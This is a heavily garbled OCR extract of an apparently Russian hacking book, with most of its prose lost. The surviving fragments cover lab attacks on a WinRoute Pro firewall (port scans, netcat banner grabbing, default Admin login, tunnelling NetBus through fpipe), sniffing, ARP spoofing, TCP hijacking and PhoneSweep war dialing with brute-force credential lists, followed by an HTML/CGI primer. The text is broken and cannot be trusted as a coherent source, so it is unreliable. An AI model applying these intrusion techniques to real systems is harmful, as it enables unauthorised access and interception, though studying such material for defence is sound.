. , , , .
. ,
,

.
,
. ,
.

Hacmpouka
, ,
- ? -


, ,
( ) .
. , .
, .
WinRoute Pro (http://www.kerio.com)
Kerio Technologies Inc. WinRoute
- , -,
( ), .
,
, . 1-1
WinRoute Pro 1-1 ,
Sword-2000. Alex- Sword-2000 1-1 .
TCP/IP Alex- IP-
2.0.0.3 255.0.0.0. 1-1 IP- 2.0.0.1 255.0.0.0.
, Windows 2000 IP-
1.0.0.1 1.0.0.7, Alex-
IP- 2.0.0.3. Alex-,
Sword-2000, - NetBUS (. 14). , NetBus - WinRoute,
.
, - ,
- . ,
. , ; - ,
. , .

XakuH2 WinRoute Pro


, ,
.
, , , .. ,


, ,
, . .

116
, , 1-1 (IP- 1.0.0.7)
.
.
SuperScan, . 16.5
IP- 1.0.0.1 - 1.0.0.7, 1-1.

[Screenshot: SuperScan scan of the range 1.0.0.1 to 1.0.0.7. Hosts found: 1.0.0.1 SWORD-2000 and 1.0.0.7 ALEX-1. The expanded port list includes 21 File Transfer Protocol [Control], 25 Simple Mail Transfer, 80 World Wide Web HTTP, 106 3COM-TSMUX and 110 Post Office Protocol Version 3; the SMTP and POP3 banners identify WinRoute Pro.]

. 16.5.
WinRoute
, 1-1 25 110 SMTP
, WinRoute Pro 4.1.30 - ! ,
1-1 3128 -, WinRoute Pro, 3129, WinRoute Pro (. 16.6).

[Screenshot: SuperScan 3.00 scan of 1.0.0.7 (resolved as ALEX-1). The port list includes 110 Post Office Protocol, 135 DCE endpoint resolution, 139 NETBIOS Session Service, 143 Internet Message Access Protocol, 445 Microsoft-DS and 3128 Squid Proxy, among others.]

Fig. 16.6. WinRoute Pro


,
1-1, netcat, , ..
, ,
. . 16.7 SMTP ( 25) ( 110) netcat.
C:\Test\netcat>nc -v -n 1.0.0.7 25
(UNKNOWN) [1.0.0.7] 25 (?) open
220 unspecified.host ESMTP - WinRoute Pro 4.1.30
quit
221 WinRoute Pro SMTP Service closing transmission channel
C:\Test\netcat>nc -v -n 1.0.0.7 110
(UNKNOWN) [1.0.0.7] 110 (?) open
+OK WinRoute Pro 4.1.30 POP3 server ready <320.1046930623@unsp
quit
+OK WinRoute Pro POP3 server signing off
C:\Test\netcat>_

. 16.7.

-
, 9 10 .


, WinRoute Pro
. , , , IDS (Intrusion Detecting System -
),
ICMP, WinRoute.

, tracert
W2RK. ICMP-,
Sword-2000 , . 16.8.
C:\>tracert -h 5 1.0.0.1
Tracing route to SWORD-2000 [1.0.0.1]
over a maximum of 5 hops:
  1     1 ms     1 ms     1 ms  ALEX-1 [2.0.0.1]
  2     *        *        *     Request timed out.
  3     *        *        *     Request timed out.
  4     *        *        *     Request timed out.
  5     *        *        *     Request timed out.

Trace complete.

Puc. 16.8. Sword-2000- !


, . 16.8,
1-1 ,
( ). ,
, - Sword-2000 - . - ,
Sword-2000. , . .

WinRoute Pro
1-1,
. 16.6, 3129 WinRoute Pro, - ,
. :
> (' , 1-3)
WinRoute Pro
,


* * WinRoute Pro WinRoute Administration (Start


Programs * WinRoute Pro * WinRoute Administration). ,
. 16.9.
Open Configuration
> WinRoute Host ( WinRoute) IP-
WinRoute,
- 1.0.0.7.

[Figure: Open Configuration dialog: "Enter a hostname or an IP address of a computer running WinRoute"; fields WinRoute Host (localhost), Username (Admin), Password; buttons OK and Cancel.]
Fig. 16.9.
WinRoute Username ( ) Admin, Password ()
WinRoute
.

> , - - ,
WinRoute
(. 16.10).

Puc. 16.10.
WinRoute Alex-1 !
- , ACL .
, -
, , .
[3] , ,
- . ,
WinRoute ( - ) -
.


,
, - ! , ?
()
, .

Win Route Pro



,
, .
( ), ,
, . .
[3],
. , TCP-, .
,
. , .
, . , . NetBUS,
14. - , ,
, .
fpipe, foundstone_tools
(http://www.foundstonetools.com), ,
TCP UDP , ,
.
,
ACL
, .. ACL .

cnuckoB ACL
, ACL
, nmap (http://www.insecure.org/nmap),


, U N I X (
Windows NT/2000/XP -).
.
ICMP ( , D ).
, ICMP
TCP SYN . , ICMP;
, IP- .
, ICMP, ( ),
, ICMP,
, -
, .
nmap ( hping
(http://www.kyuzz.org/antirez), Unix), ,
, SuperScan
1-1 - . 16.5
FTP-. .

npomokoAa FTP
FTP
FTP TCP/IP .
FTP- FTP- TCP- (.. , TCP). , - .
FTP-
21.
.
. (.. ) ,
1023, , 20.
.

.
.
.
, TCP , - . FTP-


FTP
, ,
.
, . ACL.

cnucku ACL
, ACL
,
. - , -
. . , TCP 1-1 FTP-
1024 , , .. . 16.11. Incoming | Outgoing |
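[Figure: WinRoute packet filter dialog, Incoming tab. Adapters: Novell 2000 Adapter and Realtek RTL8029(AS) Ethernet Adapter. Rules shown for the Realtek adapter: TCP, any host, all ports -> any host, port>1023; TCP, any host, all ports -> any host, all ports. Buttons: Add, Remove.]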

Puc. 16.11.
- !
, Alex- , , NetBUS,
Alex-, TCP-
NetBus 20034. , ACL. , FTP ,
.



- , 21,
fpipe 20034 , .
- ,
! , , - ,
Web- TCP- 80, - ,
, .
, ACL
, . , , .
ACL ,
, ACL. , .


, , [3],
,
.
( )
. . ,
.
, ,
, .
- . -,
ICMP,
, .
' ,
WinRoute'He . -, , .
. -,
- ,
, ACL - , , , .

17.


,
. , , TCP-,
, , , , . , Unix, , Unix [12]. Windows, , ,

-,
.
, ,
,
.


Ethernet ,
. Ethernet
- ,
,
. , , -
. ,
, (
).
- SpyNet, Web-. SpyNet
http://members.xoom.com/Iayrentiu2/, -
.
SpyNet - CaptureNet PipeNet. CaptureNet ,
Ethernet , .. Ethernet. PipeNet Ethernet , ,
, , HTTP (
Web-) .


, - SpyNet PipeNet HTTP, SpyNet . SpyNet


, - i SfA secret.txt -

Sword-2000 Alex-
This is a very big secret
Windows. 1-1
CaptureNet,
Ethernet. . 17.1
. 17.1.
secret.txt; - Notepad
Ethernet.
Ethernet .
> Alex- CaptureNet.
Capture Start ( *
) .
> Windows security.txt
Sword-2000 1-3.
> secret.txt Capture * Stop
( ) .
Ethernet CaptureNet (. 17.2), Ethernet, .
[Figure: CaptureNet window. Adapter: Realtek, promiscuous mode; the packet list shows NetBIOS frames without IP addresses, and the data pane of the selected frame shows the text "This is a very big secret".]

Puc. 17.2. Ethernet


, , This is a very big secret (


).
, - , . CaptureNet ,
,
. ,
SpyNet.
,
. , , . , Windows ,
.


,
CaptureNet, , . SpyNet , , ,
.
tcpdump (http://www.tcpdump.org), .
, , AntiSniff (http://www.securitysoftwaretech.com/antisniff), , .
-
- .
,
IP-, . , , , , .
, ( . [2]),
AntiSniff.
, ,
- , , , .
. .


ARP

IP- IP-,
ARP (Address Resolution Protocol - ).
ARP D,
() IP- (-), . ,
ARP
.

IP-,
IP- . IP- .
- , ,
nbtstat W2RK.
- , ARP-
IP- - . , IP- - ; , IP- - .
- ARP . IP-
- , , , , .

- IP- . , , , arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) .
ARP [3], [4] [12],
, ARP .
UNIX ARP
,
, arpredirect. , Windows 2000/XP
, -, . , NTsecurity
(http://www.ntsecurity.nu) GrabitAll,
.


GrabitAll ,
.


,
- -, , ,
ICMP- Redirect. Redirect , RFC-1122,
, , , .
Redirect , Redirect, Redirect
, .
, ,
, IP- ,
. , IP-,
IP- IP- ,
. ICMP Redirect , IP-
. , IP- .
(, ) ICMP Redirect, -
tracert ( Unix
traceroute). , , , ( . [12]).
( ) ,
, .
, , . ,
4 VPN (Virtual Private
Network - ).
, [7]
, PGP Desktop Security (http://www.pgp.com).


TCP-

TCP- (TCP hijacking), TCP- . , TCP TCP, .
TCP- , , , [3], Unix, Web
. , , , TCP- . (

http://www.cri.cz/-kra/index.html,
TCP- Hunt (Pavel Krauz)).
, , TCP-,
. TCP-
TCP- D ,
- TCP-?
, , , [12] [13].
TCP (Transmission Control Protocol - )
OSI, .
, , , .
TCP TCP/IP,
.
TCP- TCP- 32-
, , .
TCP-, . 6 ( ):
URG - ;
ACK - ;
PSH - ;
RST - ;


SYN - ;
FIN - .
TCP-.
1. TCP- , :
A -> B: SYN, ISSa
, SYN
(Synchronize sequence number - ),
32-
ISSa (Initial Sequence Number - ).
2.

, SYN . - ISSb;
ISSa,
, . ,
:
B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3.

, , :
; ISSa + 1;
ISSb + 1. TCP-
:
A -> B: ACK, ISSa+1, ACK(ISSb+1)

4.


TCP-:
A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA
DATA .

TCP- , TCP- TCP-


32- - ISSa
ISSb. , ISSa
ISSb, TCP-.
,
ISSa ISSb TCP TCP-,
TCP-,
!
TCP- ,
FTP TELNET TCP, FTP TELNET- TCP.


, FTP TELNET IP- ,


FTP TELNET
IP- . FTP TELNET IP-, , , , -
.
, 32- ISSa
ISSb, TCP-.
. ,
, ISSa ISSb
. , ,
TCP ,
, , , TCP-.
,
.
ISSa ISSb .
.

ISSa ISSb.

TCP-

TCP-
rsh- Unix.

TCP
.
Unix . ( , r- ). TCP-, TCP- .
,
. [13], , , .


, ,
. , .. ; ,
, TCP-.

.
, , .. .
, , ,
. - VPN .
PGP Desktop Security (
, , [7]).

18.

XakuHz
, , . , ,
, (
, ), - , , . ,
-
.
- , ,
.

, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THC-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, ( )

PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,


, ,
, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.

UcmoMHuku
- , . , ,
. , . WhoIs (, http://www.ripe.net). WhoIs , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
, -


, ,
.
.
, - . , PhoneSweep
,

(, ).

The PhoneSweep 4.4 scanner


PhoneSweep - , .
, - . -
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.

/
(Point-to-Point protocol - ).

, 1 4.
I/ , .
PhoneSweep.

PhoneSweep 4.4
PhoneSweep Demo , -.



(. 18.1).
[Figure: PhoneSweep Demo start-up dialog showing the demonstration-version notice and the End User License Agreement of Sandstorm Enterprises Inc., with I Accept, I Decline and Copy to Clipboard buttons and a Load Profile group (New, Current, Select From List).]

Puc. 18.1. PhoneSweep


Default ( ),
Current () I Accept ( ). PhoneSweep 4.4 Demo, . 18.2.
[Figure: PhoneSweep 4.4 Demo main window (localhost, DEFAULT profile). Menus: File, View, Help. Toolbar: Start, Stop, Rescan, Save, Revert, Default, Import, Export, Report, Graph, Dist, What's this?. Tabs: Phone Numbers, Results, Status, History, Setup. The Phone Numbers tab lists 555- prefixes, with Add and Delete buttons; status bar: Idle.]

Puc. 18.2. PhoneSweep




PhoneSweep 4.4 Demo


File (), View () Help (). ,
. , .
PhoneSweep 4.4 Demo
PhoneNumbers ( ), Results (), Status (),
History () Setup (). , .
PhoneSweep 4.4 Demo
.

(. ).
PhoneSweep 4.4 Demo , . , . , PhoneSweep
,
/ , ,
, ,
.
, PhoneSweep .


, (
).
Start (). ;
Start (), , . 18.3,
. ,
Default ,

Setup ().

[Figure: PhoneSweep 4.4 Demo main window with the Start button menu open: Start Now, Schedule Start..., Cancel Scheduled Start, Schedule Stop..., Cancel Scheduled Stop.]

. 18.3.
Stop (). .
Stop () ,
.
Rescan ( ).
, .
PhoneSweep Demo - New Profile (PhoneSweep Demo - ),
. 18.4.
Save (). , .
Revert ().
, , .

[Figure: "PhoneSweep 4.4 Demo - New Profile" dialog: "Please enter a new profile name:" with the value DEFAULT; buttons OK and Cancel.]

Puc. 18.4.

Default ( ). .
import ().
/ bruteforce.txt.
Export (). ( ),
.
-


Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .


PhoneSweep 4.4 Demo

(. 18.5) ,
.
[Figure: PhoneSweep 4.4 Demo, Setup tab, Profiles page. Sub-tabs: Profiles, Modems, Time, Effort, Dialing, Remote, Alerts. A note field describing the demonstration profile; buttons Open, New, Copy, Delete, Save, Undo.]

Puc. 18.5.
Profiles ()
, Profiles
(), Setup (), . 18.3.
Open (). .
Profiles () . 18.5.
New profile ( ). . Profiles () . 18.5.


Copy profile ( ).
( ).
Profiles () . 18.5.
Delete (). .
Profiles () . 18.5.
Save (). ,
, . Profiles ()
. 18.5.
Undo (). . Profiles ()
. 18.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 18.6.
[Figure: PhoneSweep 4.4 Demo, History tab. Columns: Time, Modem, Number, Result, System ID, User ID; sample rows dated 2003-03-20 for 555- numbers with results such as CARRIER and TIMEOUT; buttons Freeze and Clear.]

. 18.6. History ()


Thaw (). History ().


History () . 18.6.
Clear (). . History () Phone Numbers (
) . 18.6.
Add (). . Phone Numbers ( ) . 18.3. Clear () Add () Add Phone
Numbers ( ), - raPhoneSweep 4.4 Demo - Add P..
. 18.7 From: \
To:
Add ().
Note:
Delete ().
.

[Figure: Add Phone Numbers dialog. Fields From, To and Note; Dial time periods Business, Outside, Weekend, All; options Each Time Period and Any Time Period.]

Add/Save (/).
1
1 OK 1

, Add Phone . 18.7.

Numbers ( ).

cmpoke
PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
. Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.


Effort level ( ) - - ,
, .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - ,
PhoneSweep
. , .
-
PhoneSweep , .

PhoneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 18.5 .
> Phone Numbers ( ),
. 18.2, , Add (), Add
Phone Numbers ( ), . 18.7,
.
> PhoneSweep Start ()
.
, ,
(dialing rules).


PhoneSweep , ,
.
PhoneSweep, , , , -
.


, PhoneSweep
.

fbpagok u
.
Add Phone Numbers ( ) (. 18.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
Time (), Setup (), . 18.8.
[Figure: PhoneSweep 4.4 Demo, Setup tab, Time page. Time Period settings: Business Hours and Blackout Hours (start and end hours and minutes), Weekends (day check boxes), Import Time Periods (Business, Outside, Weekend), Delay Between Calls (seconds), and per-period Rings or Seconds limits for Business, Outside and Weekend.]

. 18.8.

Business Hours ( ) Blackout Hours ( )
, , , , .
Weekends () ( ). Import Time
Period ( ) , .


Time () Rings
() Seconds (), , , , .
Business ( ), Outside ( ) Weekend
(). , . 18.8 , 10 , 92 .
, Time ()
, .
?
- Effort ().

Hacmpouka
Effort () . 18.9.
[Figure: PhoneSweep 4.4 Demo, Setup tab, Effort page. Current Effort Level: Connect ("Connect to answering phone numbers then disconnect immediately"); Set Level and Scan For lists; Penetrate Level Options with a Username/Password list (Add and Del buttons), Maximum Guesses Per Username Per Day, Maximum Calls Per Number Per Day, Recycle Names and Find Modems First.]

. 18.9.

. 18.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).


Penetrate Level Options ( )


, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
, Maximum Calls Per
Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 18.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.i
largebruteback.txt: ,
largebrute.txt, .


, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
, PhoneSweep - ,
, .
- THC-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- - .
, ,

TeleSweep
Secure
(http://www.securelogix.com) Secure Logix.OdnaKO,
[14], TeleSweep Secure - , .

, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .

, , , .

HTML u DHTML
Web-,
HTML - ,
. , , , ( tag - ) HTML, , ,
.
, HTML . - HTML Web. ,
Web- - , - Web , , .
Web Web ,
, - ,
.
,
Web. HTML.


HTML
, HTML ,
. HTML,
.
, HTML ,
HTML, . .1 HTML.
. HTML
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"
"http://www.w3.org/TR/REC-html40/strict.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META HTTP-EQUIV="Content-Language" CONTENT="ru">
<META NAME="keywords" CONTENT=", HTML">
<META NAME="description" CONTENT=" HTML">
<TITLE> HTML</TITLE>
</HEAD>
<BODY>
<> HTML-
</BODY>
</HTML>
. . 1 HTML . 1 IE 5.
]

. . 1. HTML- IE 5
HTML . , HTML.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"

HTML - , HTML 4. , - EN ().
HTML 4 , , , HTML . <HTML> , HTML,
.

Structure of an HTML document


, HTML . , . HTML,
, .
HTML, .
, <HEAD>.
, .
<BODY>
<FRAMESET>, Web- - -


, .
,
,
Web HTML. .
- ,
HTML .
, HTML, (, , ) .
, , ,
(, , ) , . HTML , .. (. ), <SCRIPT>.

- ,
. , HTML,
.. , , .
HTML <OBJECT> <APPLET>
( W3C HTML).
HTML, ,
<IFRAME>,
HTML. <IFRAME> , , ,
IE 5
<IFRAME> .
<SCRIPT>, <OBJECT> <IFRAME>.

HTML
.1, (, HTML),
. - </HTML>, . , , - .
, <> .
, , .
, , , ; .
<>, , , , .


- , ,
<HEAD> <>. , , . , <HTML LANG="ru" DIR="LTR"> LANG, HTML ( "ru" ), DIR, ,
"LTR" - (, ).
HTML :
<_ _> </_>
, HTML. HTML 4
( http://www.w3.org)
, ,
.

>
, HTML HTML
, , Web. HTML 4
<OBJECT>,
HTML
- <APPLET>, <IMG>,
<EMBED> .
<OBJECT> , .
ID - .
CLASSID - , . , CLASSID URL - , - DATA (. ).
CODEBASE - ,
(, CLASSID, DATA
ARCHIVE). CODEBASE , URL .
CODETYPE - , , CLASSID. , ,
"text/html", "image/gif", "video/mpeg", "text/javascript", , , HTML, GIF, MPEG JavaScript.
DATA - . ,
, DATA . URL, , CODEBASE.


TYPE - , DATA.
ARCHIVE - URL
, , ,
CLASSID DATA.


, ,
.GIF, , .
, , . <OBJECT> HTML - , , HTML. .2
HTML <OBJECT>, - Microsoft Media Player.
.2. HTML
<HTML>
<HEAD>
<TITLE> <OBJECT></TITLE>
</HEAD>
<BODY>
<OBJECT
ID="WinPlayer"
CLASSID="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
</OBJECT>
</BODY>
</HTML>

To, IE 5 .2,
. .2.

. .2. - Windows Media Player


.2 CLASSID ,
<OBJECT>
CLSID, Windows ,
,
Microsoft.

CLSID , OLE (Object Linking and Embedding - ). OLE - - Microsoft, . OLE , , , Windows. OLE , , , ActiveX.
OLE
.

, , , <OBJECT> , , . , Web,
, - <IFRAME>.

The <IFRAME> tag
HTML HTML
Web; ( frame , ). , , .
Web- HTML ,
, .
<IFRAME>
HTML. . HTML
<IFRAME>, , .
.. HTML
<HTML>
<HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
Opel.
<IFRAME SRC="specification.html" WIDTH="250" HEIGHT="16"
SCROLLING="auto" FRAMEBORDER="1">
</IFRAME>
.
</BODY>
</HTML>
HTML . IE 5
. ..
[Figure: the document in Microsoft Internet Explorer, with the inline frame embedded in the text.]

. .. HTML
<IFRAME>, , , , , <IFRAME>
,
. .

HTML
HTML ,
, ,
. , HTML. HTML
<Form>, - <Script>. .

<Form>
.4 HTML , . IE 5 . .4.
.4. Web
<HTML>
<HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
<> </>
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">
<INPUT TYPE="text" ID="firstname">
<LABEL FOR="firstname">Имя: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL FOR="lastname">Фамилия: </LABEL><BR>
<INPUT TYPE="text" NAME="postal-address" ID="email">
<LABEL FOR="email">e-mail </LABEL><BR>
<INPUT TYPE="checkbox" NAME="subscribe">
новостей<BR>
<INPUT TYPE="submit" VALUE="Отправить">
<INPUT TYPE="reset">
</FORM>
</BODY>
</HTML>

.4. FORM, - LABEL INPUT.


LABEL -
. ,
Windows
(. . .4).
HTML
File Edit View Favorites Tools H
INPUT TYPE, "text". TYPE ,

INPUT, :
- .
:
TYPE .4, ,
e-mail
"checkbox", "submit" "reset", D
, , | || Reset |
, fr My Computer
.
,
. .4.
, , Windows.

06pa6omka
, .4.
Web- ,
, , , . -

308

() ,
. , , ,
. HTML URL, ACTION FORM, ,
, .4:
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">

, addsubs, /prog http://www.anysite.com. , ,


. .
METHOD FORM. post, , - get ( ).
CGI (Common Gateway Interface - ), ,
(.
). , ,
CGI, ,
.
CGI .
name1=value1&name2=value2&...

- ( ), - (.. ). ,
, , METHOD . REQUEST_METHOD (. ).
GET URL
QUERY_STRING (. ).
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.

CONTENT_LENGTH.

.
.4. POST (
FORM METHOD "post") - 42 , :
postal-address=ivan@email.com&subscribe=on

CONTENT_LENGTH 42,
. CONTENT_TYPE "application/x-www-form-urlencoded".
"",
.

. (, ).
, . Web-,
, , HTML,
HTML , ,
CGI, HTML . Web, .

The <SCRIPT> tag
<SCRIPT> HTML , ,
Web-, , - Web.
,
HTML, .
HTML ,
HTML, ,
, , Windows.
, , HTML, .
, . HTML <SCRIPT>, .
, HTML. HTML
HTML ,
.


, ,
, .
<SCRIPT> HTML,
, <HEAD>,
, <BODY>,
. <SCRIPT>.
SRC - URL -, .. ,
, Web.
TYPE -
<SCRIPT>. , "text/javascript"
JavaScript.
<SCRIPT> .
SRC , <SCRIPT> . SRC URL, <SCRIPT>
, URL.

- , .
.
, JavaScript,
write () .
<SCRIPT TYPE="text/javascript">
document.write (", !")
</SCRIPT>

, HTML
, <Script>.
HTML.
, ,
, .


, - , , , .
, HTML- HTML-, . HTML ,


HTML. ,
, . .
<A HREF="http://www.anysite.com/index.html"
onMouseOver="window.status='Щелкни , !'; return true;"> </A>
:
window.status='Щелкни , !';
return true;
( window)
.
. HTML
.
ONLOAD ,
FRAMESET.
BODY FRAMESET.
ONUNLOAD ,
. BODY FRAMESET.
ONCLICK
.
.
ONDBLCLICK
.
.
ONMOUSEDOWN .
.
ONMOUSEUP .
.
ONMOUSEOVER . .
ONMOUSEMOVE , .
.


ONMOUSEOUT
.
.
ONFOCUS
.
: LABEL, INPUT, SELECT,
TEXTAREA BUTTON.

ONBLUR .
, ONFOCUS.
ONKEYPRESS , . .
ONKEYDOWN ,
. .
ONKEYUP ,
.
.
ONSUBMIT . FORM.
ONRESET .
FORM.
ONSELECT
.
INPUT TEXTAREA.

ONCHANGE
, .
: INPUT, SELECT
TEXTAREA.


. .
,
.
.
, HTML,
INPUT, SELECT, BUTTON, TEXTAREA LABEL, -


. ,
HTML . , ,
, .
, HTML .


.5
JavaScript, ,
, ,
.
.5. Web
<HTML>
<HEAD>
<TITLE> </TITLE>
<SCRIPT TYPE="text/javascript">
// Client-side check: the expected value is readable in the page source.
function checkPassword(Password) {
  if (Password != "007") {
    alert(" !");
    return 0;
  }
  else {
    alert("!");
    return 1;
  }
}
function welcome() {
  document.write(", !")
}
</SCRIPT>
</HEAD>
<BODY>
<BR>
<INPUT TYPE="text" NAME="name" ONCHANGE="if (!checkPassword(this.value)) { this.focus(); this.select(); } else { welcome() }" VALUE="">
</BODY>
</HTML>


. .5 IE 5.
' .

Puc. A. 5.
(. .6)
window.document.myform.mybutton.onclick = my_onclick.
.6.
<HTML>
<HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
<FORM NAME="myform">
<INPUT TYPE="button" NAME="mybutton" VALUE=" ">
</FORM>
<SCRIPT TYPE="text/javascript">
function my_onclick() {
  alert(", !")
}
window.document.myform.mybutton.onclick = my_onclick
</SCRIPT>
</BODY>
</HTML>
.

The CGI protocol
HTML 4,
. - ,
. , ,
- .
.
1. HTML
.
2.

- , , .. - .

3. , HTML 4
, URL, ACTION
Web
.
HTTP,
.
4. URL,
, .
5. , ,
, .
6. (
), ,
.
- .Web,
; ,
HTTP 1.1, .
CGI (Common Gateway Interface - ).
,
NCSA (National Center for Supercomputing Applications -
)
, Web.
7.

,
, METHOD
FORM. HTML 4 - POST
GET, HTTP.

8. ( ) ,
, .

9.

.

Web (
).

10. , ,
( )
.
11. .
,
,
- Web.
HTML 4, ,
.
HTTP,
Web.
CGI, Web-
.
.


(,
) ,
.
1. , .. ,
. ,
,
.
2.

, /.
.

3.

,
ENCTYPE FORM.

HTTP
, - .
, ,

.



- ,
, .
;
.
FORM
.
.
,
.
SELECT, OPTION.
SELECT .

.

.
.
,
NAME, .
, OBJECT
.

, . ,

OBJECT, DECLARE.
, ,
. , .
<FORM ACTION="http://www.anysite.com/prog/anyprog" METHOD="post">
<INPUT TYPE="text" STYLE="display:none" NAME="hide-text" VALUE="myname">
</FORM>

"myname"
"hide-text" /
.




ENCTYPE FORM,
, .
,
.

The "application/x-www-form-urlencoded" type
. ,
,
.
,
+. ,
, %,
, ASCII .
CRLF (.. %0D%0A).
/
. =,
/ &.
, , .
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">
<INPUT TYPE="text" NAME="firstname" ID="firstname">
<LABEL FOR="firstname">Имя: </LABEL><BR>
<INPUT TYPE="text" NAME="lastname" ID="lastname">
<LABEL FOR="lastname">Фамилия: </LABEL><BR>
<INPUT TYPE="text" NAME="postal-address" ID="email">
<LABEL FOR="email">e-mail </LABEL><BR>
<INPUT TYPE="checkbox" NAME="subscribe">
новостей<BR>
<INPUT TYPE="submit" VALUE=" "> <INPUT TYPE="reset">
</FORM>

Ivan Petrov
petrov@email.com
:
firstname=Ivan&lastname=Petrov&postal-address=petrov@email.com&subscribe=on


The "multipart/form-data" type
"application/x-www-form-urlencoded"
,
, ASCII. ,
, ASCII,
, "multipart/form-data".
"multipart/form-data"
,
.
,
HTML.
"Content-Type", "text/plain".
, .
"Content-Disposition", "form-data".
.
, "control-name" :
Content-Disposition: form-data; name="control-name"

, ,

(,
"application/octet-stream").
,
"multipart/mixed".
"multipart/form-data". ,
.
<FORM ACTION="http://www.anysite.com/cgi-bin/handler"
ENCTYPE="multipart/form-data" METHOD="post">
<>
<INPUT TYPE="text" NAME="name_of_sender"><BR>
<>
<INPUT TYPE="file" NAME="name_of_files">
<HR>
<INPUT TYPE="submit" VALUE=" "> <INPUT TYPE="reset">
</FORM>
"ivanov"
"content.txt",
.


Content-Type: multipart/form-data; boundary=STRING_SEPARATOR

--STRING_SEPARATOR
Content-Disposition: form-data; name="name_of_sender"

Ivanov
--STRING_SEPARATOR
Content-Disposition: form-data; name="name_of_files"; filename="content.txt"
Content-Type: text/plain

. . . content.txt . . .
--STRING_SEPARATOR--

boundary, ,
.
"logo.gif",
.
Content-Type: multipart/form-data; ^=_
--_-Content-Disposition:
form-data; name="name_of_sender"
Ivanov
--_-Content-Disposition: form-data; name="name_of_files"
Content-Type: multipart/mixed; 1=_
--_-Content-Disposition: attachment; filenames"content.txt"
Content-Type: text/plain
. . . content.txt . . .
--_
Content-Disposition: attachment; filename="logo.gif"
Content-Type: image/gif
Content-Transfer-Encoding: binary
... l o g o . g i f . . .
_-_--

, , ,
- .
, .


HTML 4
HTTP
( HTTP).
HTTP ,
, HTTP ,
, HTTP


, , .
,
.
Request-Line = Method SP Request-URI SP HTTP-Version CRLF

SP - ASCII ( 32), -
HTTP, ,
URL, a CRLF - (CR) (LF).
HTTP ,
, HTML 4.
GET - ,
, URL .
.
POST , ,
,
URL .
HTML 4 HTTP,
, METHOD FORM.
.
METHOD "get",
ACTION HTTP,
ACTION, ?,
,


"application/x-www-form-urlencoded".
GET HTTP, URL .
GET
ASCII.
METHOD "post", ACTION
HTTP,
POST HTTP ACTION
, ,
ENCTYPE (.
).
ACTION METHOD
HTML 4 .
GET POST HTTP .
, .



, HTTP
CGI. ,

Web, , HTTP. CGI
, Web , , , . CGI- -
Web . CGI , ,
.,
.
CGI- Web
. , CGI,
. , ,
, .
, , C/C++,
PHP, Fortran, Perl, TCL, Unix Shell, Visual Basic, Apple Script .
Web-,
(
).
,
CGI .
-.


, ,
- .
HTTP ,
, (Windows, UNIX .)
.
- ,
. , MS DOS
Windows, .
,
,
. ,
arj a archiv file.txt


arj.exe (
) archiv file.txt.
- , , . ,
, .
Web , .
getenv().
- ,
.
, . STDIN;
STDIN fgetc (stdin).
.
name1=value1&name2=value2&...
- (
), -
(.. ). ,
, ,
METHOD .
REQUEST_METHOD (. ).
GET URL , QUERY_STRING.
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.
CONTENT_LENGTH.
.
.
<HTML>
<HEAD>
<TITLE> </TITLE>
</HEAD>
<BODY>
<> </>
<FORM ACTION="http://www.anysite.com/prog/addsubs" METHOD="post">
<INPUT TYPE="text" ID="firstname">
<LABEL FOR="firstname">Имя: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL FOR="lastname">Фамилия: </LABEL><BR>
<INPUT TYPE="text" NAME="postal-address" ID="email">
<LABEL FOR="email">e-mail </LABEL><BR>
<INPUT TYPE="checkbox" NAME="subscribe">
новостей<BR>
<INPUT TYPE="submit" VALUE=" "> <INPUT TYPE="reset">
</FORM>
</BODY>
